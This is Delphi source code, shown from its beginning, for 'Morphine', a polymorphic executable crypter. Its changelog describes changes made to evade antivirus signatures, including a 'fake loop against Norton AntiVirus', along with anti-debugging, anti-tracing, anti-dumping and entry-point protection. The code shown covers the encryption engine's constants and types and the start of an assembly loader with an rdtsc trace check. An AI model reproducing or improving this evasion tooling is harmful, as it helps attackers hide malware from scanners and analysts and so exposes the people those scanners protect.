program morphine;
{$APPTYPE CONSOLE}
//Upgraded, fixed and reloaded by Silent Shield (Dayvo)
//if RUBBISH_NOPS defined, inserted rubbish are nops only (good for debugging)
{ $DEFINE RUBBISH_NOPS}
{ $DEFINE STATIC_CONTEXT}
uses Windows, apLib, Classes, SysUtils, pelib;
{$R *.res} //Icon Resource DATA
//ORIGINAL
//this is how our new PE loox like:
//
//CodeSection:
//0..$10: jmp GetProcAddress+jmp LoadLibrary+pad
//$10..$10+KeySize:Key
//$10+KeySize..$10+KeySize+sizeof(DynLoader):DynLoader
//$10+KeySize+sizeof(DynLoader): code
//
//DataSection:
//0..sizeof(host)-1: host
//
//ImportSection:
//0..$70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//
//Changelog 1.2a
//moved import function jmps (getprocaddress, loadlibrary) to the end of initdata/polymorphic loader to
//prevent AV detection (code section started with ..000000FF2534.. which was a signature):
//implemented several variants of each jmp to import section (getprocaddress, loadlibrary) and added fixups
//this is how our new PE loox like:
//
//CodeSection:
//$0..KeySize:Key
//KeySize..KeySize+sizeof(DynLoader):DynLoader
//KeySize+sizeof(DynLoader): code
//
//DataSection:
//0..sizeof(host)-1: host
//
//ImportSection:
//0..$70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//Changelog 1.2b
//- some random data (CoderRoller1) into encryption routine (DynCoder and Decoder)
//- data section eliminated (too risky to have it)
//- minor bug fixes
//
//this is how our new PE loox like:
//
//CodeSection:
//0: Rubbish
//KeyPtr..KeyPtr+KeySize:Key
//KeyPtr+KeySize..KeyPtr+KeySize+sizeof(DynLoader):DynLoader
//KeyPtr+KeySize+sizeof(DynLoader): code
//code+sizeof(code): host
//
//ImportSection:
//0..$70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//Changelog 1.3
//- polycode liposuction
//- polycode instruction naming
//Changelog 1.4
//- DLL SUPPORT!!!
//- well some hacks are here, so nobody can say that the code is correct - see DynLoader
//- minor bugfixes
//+ .edata section after .tls
//Changelog 1.5
//- polycode improved
//Changelog 1.6
//- polycode shrinked
//- dynloader decrypts main data
//Changelog 1.7
//- secondary encryption routine has variable-length key
//Changelog 1.8
//- polycode shrinked
//Changelog 1.9
//- icon + XP manifest support
//Changelog 2.0
//- secondary encryption routine is randomly generated
//- resource support for DLLs
//- fake loop against Norton AntiVirus
//Changelog 2.1
//- FSG 2.0 exe packer support
//Changelog 2.2
//- support for some other exe packers - Mew 1.1
//Changelog 2.3
//- fixed two serious bugz
//Changelog 2.4
//- better support for VB programs
//- support for end of file overlay data
//Changelog 2.5
//- bugfix in TLS support
//Changelog 2.6
//- bugfix in TLS support number 2
//Changelog 2.7
//- better DLL handling -> support for NT4 DLLs
//Changelog 2.8
//- tracing protection
//Changelog 2.9
//- tracing protection fixed
//- OEP Protection
//Changelog 3.0
//- now it can pack EXE or DLL
//Changelog 3.1
//- AntiDumping Protection
//Changelog 3.2
//- this program wasn't published because it has a lot of problems and I don't know how to fix them
//Changelog 3.3
//- only Anti Debugger Function added, but it contains Ultra Halt :-0
//Changelog 3.5
//- only Sm@ll Import Table Protection added, but it contains Some crazy Functions
//if you need sum PEB, TEB structures (like in DynLoader)
//try looking at these links:
//http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Thread/TEB.html
//http://undocumented.ntinternals.net/UserMode/Structures/LDR_MODULE.html
//http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB.html
const
//we need a dos stub
//that's the common dos prog writing "This program must be run under Win32"
//(an older comment said "cannot be run in DOS mode", but that is not what these bytes spell)
//bytes 0..$F:  mov dx,10h / push cs / pop ds / mov ah,9 / int 21h / mov ax,4C01h / int 21h / nop / nop
//bytes $10..: the '$'-terminated message that int 21h/AH=9 prints from cs:10h
DosStub:array[0..$38-1] of Byte=
($BA,$10,$00,$0E,$1F,$B4,$09,$CD,$21,$B8,$01,$4C,$CD,$21,$90,$90, //16-bit code, nop-padded to $10
$54,$68,$69,$73,$20,$70,$72,$6F,$67,$72,$61,$6D,$20,$6D,$75,$73, //"This program mus"
$74,$20,$62,$65,$20,$72,$75,$6E,$20,$75,$6E,$64,$65,$72,$20,$57, //"t be run under W"
$69,$6E,$33,$32,$0D,$0A,$24,$37); //"in32",CR,LF,'$' terminator, one trailing byte
//import section constants
NumberOfDLL=1; //number of dlls
NumberOfImports=2; //number of funcs
Kernel32Name='KeRnEl32.dLl'; //name of dll (12 chars, see Kernel32Size)
NtdllName='ntdll.dll'; //name of ntdll.dll (no matching *Size constant is declared for it)
GetProcAddressName='GetProcAddress'; //name of funct1 (14 chars, see GetProcAddressSize)
LoadLibraryName='LoadLibraryA'; //name of func2 (12 chars, see LoadLibrarySize)
Kernel32Size=12; //length of dll name
GetProcAddressSize=14; //length of func1 name
LoadLibrarySize=12; //length of func2 name
//polymorphic instruction indexes
//consecutive indexes, each defined as the previous one +1; a few names are aliases of the
//same index: PII_POLY_PUSHAD=PII_POLY_BEGIN=PII_BEGIN, PII_CODER_MOV_REG_KEY=PII_CODER_KEY_START,
//PII_CODER_LOAD_KEY_TO_REG=PII_CODER_CODE and PII_POLY_END=PII_POLY_JMP_DYNLOADER=PII_END
PII_BEGIN = 0;
PII_POLY_BEGIN = PII_BEGIN;
PII_POLY_PUSHAD = PII_POLY_BEGIN;
PII_POLY_MOV_REG_LOADER_SIZE = PII_POLY_PUSHAD+1;
PII_POLY_MOV_REG_LOADER_ADDR = PII_POLY_MOV_REG_LOADER_SIZE+1;
PII_CODER_BEGIN = PII_POLY_MOV_REG_LOADER_ADDR+1;
PII_CODER_CALL_GET_EIP = PII_CODER_BEGIN+1;
PII_CODER_GET_EIP = PII_CODER_CALL_GET_EIP+1;
PII_CODER_FIX_DST_PTR = PII_CODER_GET_EIP+1;
PII_CODER_KEY_START = PII_CODER_FIX_DST_PTR+1;
PII_CODER_MOV_REG_KEY = PII_CODER_KEY_START;
PII_CODER_FIX_SRC_PTR = PII_CODER_MOV_REG_KEY+1;
PII_CODER_CODE = PII_CODER_FIX_SRC_PTR+1;
PII_CODER_LOAD_KEY_TO_REG = PII_CODER_CODE;
PII_CODER_TEST_KEY_END = PII_CODER_LOAD_KEY_TO_REG+1;
PII_CODER_JZ_CODER_BEGIN = PII_CODER_TEST_KEY_END+1;
PII_CODER_ADD_DATA_IDX = PII_CODER_JZ_CODER_BEGIN+1;
PII_CODER_XOR_DATA_REG = PII_CODER_ADD_DATA_IDX+1;
PII_CODER_STORE_DATA = PII_CODER_XOR_DATA_REG+1;
PII_CODER_INC_SRC_PTR = PII_CODER_STORE_DATA+1;
PII_CODER_LOOP_CODER_CODE = PII_CODER_INC_SRC_PTR+1;
PII_CODER_END = PII_CODER_LOOP_CODER_CODE+1;
PII_POLY_JMP_DYNLOADER = PII_CODER_END+1;
PII_POLY_END = PII_POLY_JMP_DYNLOADER;
PII_END = PII_POLY_END;
//other consts
MaxPolyCount=20; //maximum variants for one instruction
InitInstrCount=PII_END+1; //polymorphic loader instruction count (PII_END is the last index, hence +1)
RawDataAlignment=$200; //alignment of SizeOfRawData
DosStubEndSize=$88; //$100 - SizeOf(TImageDosHeader) ($40) - SizeOf(DosStub) ($38): DOS header + stub + this pad = $100
//image type const
IMAGE_TYPE_EXE=0;
IMAGE_TYPE_DLL=1;
IMAGE_TYPE_SYS=2;
IMAGE_TYPE_UNKNOWN=$FFFFFFFF;
//this dword is at the end of DYN_LOADER in decoded form
DYN_LOADER_END_MAGIC=$C0DEC0DE;
DYN_LOADER_DEC_MAGIC=$1EE7C0DE; //NOTE(review): use not visible in this chunk - presumably a second marker; confirm in the main body
//registers
//x86 register numbers in ModRM/opcode encoding order (eax=0 .. edi=7)
REG_EAX=0;
REG_ECX=1;
REG_EDX=2;
REG_EBX=3;
REG_ESP=4;
REG_EBP=5;
REG_ESI=6;
REG_EDI=7;
REG_NON=255; //"no register"
Reg8Count=8;
Reg16Count=8;
Reg32Count=8;
RT_XP_MANIFEST=24; //resource type RT_MANIFEST (24), used for the XP manifest resource
type
//now several types i was unable to find in std windows.pas
//and was so lazy to use more units :o)
//import-by-name entry: ordinal hint followed by the function name
PImageImportByName=^TImageImportByName;
TImageImportByName=packed record
Hint:Word;
Name:array of Char;
end;
//one import thunk: four views of the same 32-bit slot, selected by how the entry is interpreted
PImageThunkData=^TImageThunkData;
TImageThunkData=packed record
case Byte of
0:(ForwarderString:PByte);
1:(FunctionPtr:PCardinal);
2:(Ordinal:Cardinal);
3:(AddressOfData:PImageImportByName);
end;
//import descriptor (one per dll): variant 0 names the first dword Characteristics,
//variant 1 names the same dword OriginalFirstThunk - both views have identical layout
PImageImportDescriptor=^TImageImportDescriptor;
TImageImportDescriptor=packed record
case Byte of
0:(Characteristics,cTimeDateStamp,cForwarderChain,cName:Cardinal;cFirstThunk:PImageThunkData);
1:(OriginalFirstThunk:PImageThunkData;oTimeDateStamp,oForwarderChain,oName:Cardinal;oFirstThunk:PImageThunkData);
end;
//PE export directory table (all RVAs are relative to the image base)
PExportDirectoryTable=^TExportDirectoryTable;
TExportDirectoryTable=packed record
Flags,TimeStamp:Cardinal;
MajorVersion,MinorVersion:Word;
NameRVA,OrdinalBase,AddressTableEntries,NumberOfNamePointers,ExportAddressTableRVA,
NamePointerRVA,OrdinalTableRVA:Cardinal;
end;
//that's how .tls section loox like (the 32-bit TLS directory: six dwords)
PTlsSectionData=^TTlsSectionData;
TTlsSectionData=packed record
RawDataStart,RawDataEnd,AddressOfIndex,AddressOfCallbacks,SizeOfZeroFill,Characteristics:Cardinal;
end;
//our type for all about tls section
//Directory/SectionData point into the host image; RawData/Callbacks hold copies with their lengths
TTlsCopy=record
Directory:PImageDataDirectory;
SectionData:PTlsSectionData;
RawData:Pointer;
RawDataLen,Index:Cardinal;
Callbacks:Pointer;
CallbacksLen:Cardinal;
end;
//one pseudo-instruction (p-i) from polymorphic engine (can contain more than one x86 instruction)
//packed: 1 + 4 + 31 = 36 bytes
TInstruction=packed record
Len:Byte; //opcode length
Fix1,Fix2,Fix3,Fix4:Byte; //bytes indexes for fixup
Code:array[0..30] of Char; //opcode
end;
//a list of p-i, we will chose one each time and put it into a code
TVarInstruction=packed record
Count,Index:Byte; //number of p-i and number of the chosen
VirtualAddress:Cardinal; //address of instruction in CODE section
Vars:array[0..MaxPolyCount-1] of TInstruction;//the list (at most MaxPolyCount variants)
end;
//PE resource directory header; NumberOfNameEntries+NumberOfIDEntries entries follow it
PResourceDirectoryTable=^TResourceDirectoryTable;
TResourceDirectoryTable=packed record
Characteristics:Cardinal;
TimeDateStamp:Cardinal;
MajorVersion:Word;
MinorVersion:Word;
NumberOfNameEntries:Word;
NumberOfIDEntries:Word;
end;
//one resource directory entry: name/ID and the RVA of a subdirectory or data entry
PResourceDirectoryEntry=^TResourceDirectoryEntry;
TResourceDirectoryEntry=packed record
NameID:Cardinal;
SubdirDataRVA:Cardinal;
end;
//leaf of the resource tree: where the resource bytes are and how big they are
PResourceDataEntry=^TResourceDataEntry;
TResourceDataEntry=packed record
DataRVA:Cardinal;
Size:Cardinal;
Codepage:Cardinal;
Reserved:Cardinal;
end;
//a directory header immediately followed by its first entry (single-entry directory shape)
PResourceTableDirectoryEntry=^TResourceTableDirectoryEntry;
TResourceTableDirectoryEntry=packed record
Table:TResourceDirectoryTable;
Directory:TResourceDirectoryEntry;
end;
//icon group entry as stored in an RT_GROUP_ICON resource (ID = resource id of the icon image)
PIconDirectoryEntry=^TIconDirectoryEntry;
TIconDirectoryEntry=packed record
Width:Byte;
Height:Byte;
ColorCount:Byte;
Reserved:Byte;
Planes:Word;
BitCount:Word;
BytesInRes:Cardinal;
ID:Word;
end;
//icon group header; fixed room for 32 entries, Count says how many are valid
PIconDirectory=^TIconDirectory;
TIconDirectory=packed record
Reserved:Word;
ResType:Word;
Count:Word;
Entries:array[0..31] of TIconDirectoryEntry;
end;
//kind of input image (see also the IMAGE_TYPE_* constants above)
TImageType=(itExe,itDLL,itSys);
//stdcall function pointer: takes an address, returns a dword
TEncoderProc=function(AAddr:Pointer):Cardinal; stdcall;
var
//global state shared by the whole program; most of these are filled in by the main
//body, which is outside this chunk - the notes below are grouped by type only
//output PE headers (DOS header, stub padding, NT headers)
DosHeader:TImageDosHeader;
DosStubEnd:array[0..DosStubEndSize-1] of Char;
NtHeaders:TImageNtHeaders;
FileHandle,MainFile:THandle;
InputFileName,OutputFileName,Options:string;
//sizes, offsets, RVAs and counters (all 32-bit)
NumBytes,TotalFileSize,MainSize,LoaderSize,VirtLoaderData,VirtMainData,VirtKey,InitSize,KeyPtr,
AnyDWORD,LoaderPtr,TlsSectionSize,Delta,HostImageBase,HostSizeOfImage,HostCharacteristics,
ReqImageBase,RandomValue,ExportSectionSize,CurVirtAddr,CurRawData,ExportRVADelta,
HostExportSectionVirtualAddress,ExportNamePointerRVAOrg,ExportAddressRVAOrg,
ImportSectionDataSize,HostImportSectionSize,ImportSectionDLLCount,
HostImportSectionVirtualAddress,InitcodeThunk,CodeSectionVirtualSize,LoaderRealSize,
MainRealSize,MainRealSize4,LogCnt,MainDataDecoderLen,DynLoaderDecoderOffset,LdrPtrCode,LdrPtrThunk,
ResourceSectionSize,HostResourceSectionSize,ResourceIconGroupDataSize,HostResourceSectionVirtualAddress,
ResourceXPMDirSize,AfterImageOverlaysSize:Cardinal;
//section headers - presumably of the output image (see the layout comments at the top); confirm in the main body
CodeSection,ExportSection,TlsSection,ImportSection,ResourceSection:TImageSectionHeader;
//import table pieces: one descriptor plus the all-zero terminator, and the two thunks
ImportDesc,NullDesc:TImageImportDescriptor;
PImportDesc:PImageImportDescriptor;
ThunkGetProcAddress,ThunkLoadLibrary:TImageThunkData;
NullWord,KeySize,TrashSize,Trash2Size,HostSubsystem:Word;
//untyped buffers; {A}/{E} are the author's own markers, meaning not visible here
{A}MDC,{E}MainData,MainDataCyp,LoaderData,Key,InitData,Trash,Trash2,Ptr,ExportData,ImportSectionData,ResourceData,
MainDataEncoder,MainDataDecoder,AfterImageOverlays:Pointer;
PB,PB2,PB3,PB4,DynLoaderSub,LdrPtr,MainDataDecPtr:PByte;
//feature flags / presence of optional host sections
TlsSectionPresent,ExportSectionPresent,Quiet,DynamicDLL,ResourceSectionPresent,SaveIcon,
SaveOverlay,OverlayPresent:Boolean;
TlsCopy:TTlsCopy;
TlsSectionData:TTlsSectionData;
ImageType:TImageType;
PackedSize,I:Integer;
DynLoaderJmp:PCardinal;
//resource tree nodes of interest (root, icon group, XP manifest)
ResourceRoot,ResourceIconGroup,ResourceXPManifest:PResourceDirectoryTable;
ResourceDirEntry:PResourceDirectoryEntry;
EncoderProc:TEncoderProc;
procedure DynLoader; assembler; stdcall;
//THE LOADER!
//this loads pe file to memory from MainData
//fixup relocations
//fixup imports
//fixup exports
//doesn't protect pages - cuz we don't need this !?
//
asm
push 012345678h //LoadLibrary
push 012345678h //GetProcAddress
push 012345678h //Addr of MainData
//now lil hack
//we use rva for maindata, but we don't know image base
//we get eip and and it with 0FFFFF000h which does
//from 000401XXXh something like 000401000h that's why we
//have to be sure this code is not after 2000h, but WE DO know it
// Trace Tester
db 0fh,031h
push eax
db 0fh,031h
sub eax,dword ptr [esp]
add esp,04h
cmp eax,0FFFh
ja @traced
jmp @not_traced
@traced:
popad
popad
retn
@not_traced:
{
//OEP Protection
push FS:[30h]
pop ebp
mov ebp,[ebp+0Ch]
mov ebp,[ebp+0Ch]
mov DWORD PTR [ebp+20h],0FFFFFh // increase size variable
//
}
call @get_eip
@get_eip:
pop eax
and eax,0FFFFF000h
add [esp],eax
add [esp+004h],eax
add [esp+008h],eax
call @DynLoader_begin
//one more hack here
//code in LoadLibrary that call DllMain saves its esp into esi
//but we modify esi a lot and we shouldn't do this, also ebp for NT4 is need to safe
//but we can fix this up, cuz we know we left esp and it has right value
//so add sum 010h for DllMain params + ret addr and here we go